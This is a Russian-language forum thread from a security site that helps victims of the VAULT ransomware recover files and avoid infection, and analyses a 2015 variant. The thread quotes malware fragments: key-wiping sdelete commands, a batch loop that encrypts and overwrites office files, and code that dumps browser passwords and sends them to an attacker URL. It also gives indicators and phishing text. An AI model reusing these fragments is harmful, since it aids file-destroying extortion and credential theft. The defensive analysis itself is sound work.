[ Закрыто ] VAULT. что делать? , bat encoder / CryptVault

RSS


Если вам необходимо восстановить документы зашифрованные VAULT, выполните следующие действия:

1. проверьте наличие теневых копий на дисках, если есть чистые теневые копии, восстановить документы можно без расшифровки.
Используйте для работы с теневыми копиями ShadowExplorer

если теневые копии отсутствуют, возможно были отключены шифратором, восстановите (на будущее) через настройки защиты дисков резервирование
пространства в 5-10% под теневые копии.

2. если теневые и архивные копии отсутствуют, вы можете попытаться самостоятельно выполнить расшифровку документов.
для этого необходимо найти файл secring.gpg.
secring.gpg(sec key) здесь нужен не любой, не найденный по дороге домой из сетевого форума, а созданный на вашей машине (как правило в %TEMP%
юзера) в момент запуска процесса шифрования. Хотя вероятность успешного поиска secring.gpg невелика, поскольку шифратор тщательно затирает
данный ключ с помощью утилиты sdelete.exe.

Цитата
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\secring.gpg"
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\vaultkey.vlt"
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\confclean.list"
Повторный запуск шифратора с целью получения этого ключа не поможет. ключ будет создан уже с другим отпечатком и ID, и для расшифровки ваших документов
не подойдет. пробуйте искать данный ключ среди удаленных файлов, но обязательно ненулевого размера. ~1Кб.

что делает шифратор с исходными файлами:
Код
dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
echo %%i>> "%temp%\conf.list"
)

после шифрования к примеру файла 1.doc рядом с ним создается зашифрованный файл 1.doc.gpg, затем зашифрованный 1.doc.gpg перемещается на место исходного_чистого с новым именем 1.doc,
и только затем переименовывается в 1.doc.vault.
т.о. исходный файл не удаляется, а перезаписывается зашифрованным документом с целью невозможности его восстановления.
-------
Добавим,  что злоумышленники после завершения шифрования оставляют на диске файлы  VAULT.KEY и CONFIRMATION.KEY. Первый содержит экспортированный secring.gpg,
но зашифрованный с помощью pub key злоумышленников, поэтому  расшифровать его на нашей стороне невозможно.
В CONFIRMATION.KEY содержится полный список зашифрованных файлов. Оба эти файла оставлены на диске в качестве жеста "доброй, но и злой" воли
с  целью "протянуть руку товарищеской, но платной помощи" пострадавшему юзеру.
--------
если sec key найден, вы можете установить GnuPG и GPGShell и проверить возможность расшифровки.

скачайте отсюда и установите GnuPG
+
отсюда можно скачать GPGShell

В GPGShell удобно (из контекстного меню) выполнять различные действия над файлами и ключами.
+
После установки в каталоге так же можно найти подробный мануал (gpg.man) по консольным командам в GnuPG.
-----------

как можно избежать встречи с VAULT?
1. будьте предельно внимательны при работе с почтой.
если вложенный в сообщение или добавленный по ссылке архив содержит исполняемые файлы *.exe, *.com, *.pif, *.js, *.cmd, *.scr, *.bat, то такой документ никак не может быть офисным документом.
Значит вас вводят в заблуждение, выдавая черное за белое.
2. настройте самостоятельно или попросите админа настроить политики ограниченного запуска исполняемых программ из вложенных архивов.
например:
Цитата
%userprofile%\Local Settings\Temp\_tc\*.js
%userprofile%\Appdata\Local\Temp\_tc\*.js
3. Пробуйте с помощью HIPS запретить запись в файл %TEMP%\pubring.gpg.
в любом случае, в данной модификации энкодера (если он использует GnuPG) после скачивания и запуска утилита gpg.exe (которая может быть переименована и упакована как угодно) вначале будет создавать ключевую
пару pubring.gpg/secring.gpg, а затем уже - шифровать ваши данные с помощью созданных ключей.

4. Если предварительно положить (и защитить от изменения) известный вам ключ pubring.gpg, то в этом случае
шифрование состоится, но известным ключом. Или не состоится.

(с), chklst.ru

Ответы

Цитата
Антоша Свистунов написал:
1 - сможет ли шифровальщик забраться в защищенную паролем (сторонними программами ) папку и там все перелапатить ?
если вы интересуетесь методами защиты от шифраторов, возьмите самостоятельно и проверьте.
шифратор следует запускать на виртуальной машине для тестов.

Цитата
2 - если я в своих фотографиях (а именно они меня больше беспокоят), заменю расширение на другое (например foto.cyop)? шифровальщик пройдет мимо их, он нацелен именно на расширение или он способен прощупать файл на предмет фотографии ?

даже больше.
он способен узнать вас по фотографии, и зашифровать даже если там будет добавлено для маскировки расширение шифратора. :)
Изменено: santy - 25.08.2015 17:08:52
История как у всех - пришло письмо.
Вопрос - можно ли узнать ключ, если есть 2 файла:
1 до "vault'a"
2 после "vault'a"
Или это не поможет и нужен secring.gpg?
Спасибо!
не поможет. нужен secring.gpg
причем найти его на диске (в том числе и среди удаленных файлов) - все равно что выиграть в лотерею или спортлото большую сумму денег. :)
http://chklst.ru/forum/discussion/1535/%D0%B8schut-pozharnye-ischet-miliciya-
Подскажите, а данный шифровальщик "допом" пороли с браузеров не тащит?
Дмитрий Федоров,
конечно тащит.
Цитата

                                **********************************************
                                         Browser Password Recovery Report
                                **********************************************

____________________________________________________________­___________
Produced by BrowserPasswordDump from http://www.SecurityXploded.com


из тела энкодера запускается утилита для поиска паролей в браузерах.
найденные пароли будут отправлены на сайт злоумышленников.

фрагмент кода:

Цитата
if exist 065ed39e.exe (
"%temp%\065ed39e.exe" -f "%temp%\6eb7832c.a238703f"
wscript.exe //B //Nologo //T:120 "%temp%\3c2901e8.vbs" "%temp%\6eb7832c.a238703f" хттп://attached-email.com/v.php pf
del /f /q 065ed39e.exe
)
Изменено: santy - 01.09.2015 08:42:51
Будем менять тогда...
спс
судя по сообщениям, ВАУЛТ вновь активен.
https://www.virustotal.com/ru/file/d84c4e2edfb1762defec41258df3a6abe1bb6295d530de96­9e891a45e35d8efb/analysis/1445941012/
второй вариант
https://www.virustotal.com/ru/file/17b4e407f4acd65ef6558c1a4763552ae249882b523932ba­dc6eb4b99ad77304/analysis/1445946550/
Изменено: santy - 27.10.2015 14:54:04
Увы да, попали утром. 8к файлов. Есть тело, pubring.gpg и еще набор js. secring еще в процессе поиска.

p.s. Нынешний герой с revault.me
Изменено: Никита Михнев - 27.10.2015 14:06:36
установил виртуалку, попробую найти "10 отличий" от тех вариантов что были в августе

по ВАУЛТ изменений нет. расшифровка возможна только при наличие живого secring.gpg
времени достаточно - 2года активности (данного шифратора), чтобы понять, что расшифровку ждать бессмысленно, необходимо принимать жесточайшие меры по предотвращению подобных запусков с помощью политик, или использовать нестандартные решения.
-------
1. для предотвращения запуска шифратора блокируем адрес
*revault.me*
2. для шифрования secring.gpg юзера используется новый ключ мошенников:
VaultCrypt
0x35E2868D
от 23 октября 2015 г
3.для восстановления secring.gpg ищем среди удаленных файл:
e6335bfe.7c8f89eb
4. утилита gpg.exe переименована в d4a76286.exe
gpg (GnuPG) 1.4.18
Copyright © 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Home: C:/Users/***/AppData/Roaming/gnupg
Supported algorithms:
Pubkey: RSA, RSA-E, RSA-S, ELG-E, DSA
Cipher: IDEA, 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH,
       CAMELLIA128, CAMELLIA192, CAMELLIA256
Hash: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
Compression: Uncompressed, ZIP, ZLIB, BZIP2
5. тело бат-шифратора:
vb17330200.bat

6. текст сообщения
Цитата
Тема: Акт Сверки - октябрть

Добрый час, Мы со своей стороны понимаем, что в стране кризис, но все же мое руководство распорядилoсь подписать с Вами Акт сверки (см. приложение к письму) и отобразить имеющийся долг. Будьте добры проверить приложенный документ и сориентировать по срокам оплаты.

7. имя исполняемого js из вложения
Акт_сверки_27 октября 2015 года_задолженность по счетам за прошлые периоды_бухгалтерия - согласовано_аудит - ПОДПИСАНО_f41f9a6ff9d.dосх .js
эта часть может меняться
f41f9a6ff9d
и
Акт сверки от 27 октября 2015г. Задолженность по счетам за прошлые периоды. Согласовано бухгалтерией. Подписано директором_ 17525167491.рdf .js
Изменено: santy - 27.10.2015 17:55:14
Вирлаб сообщил что заблокировал ссылки на загрузку угрозы. Так что если база актуальная, то заразится не должны
Читают тему (гостей: 2)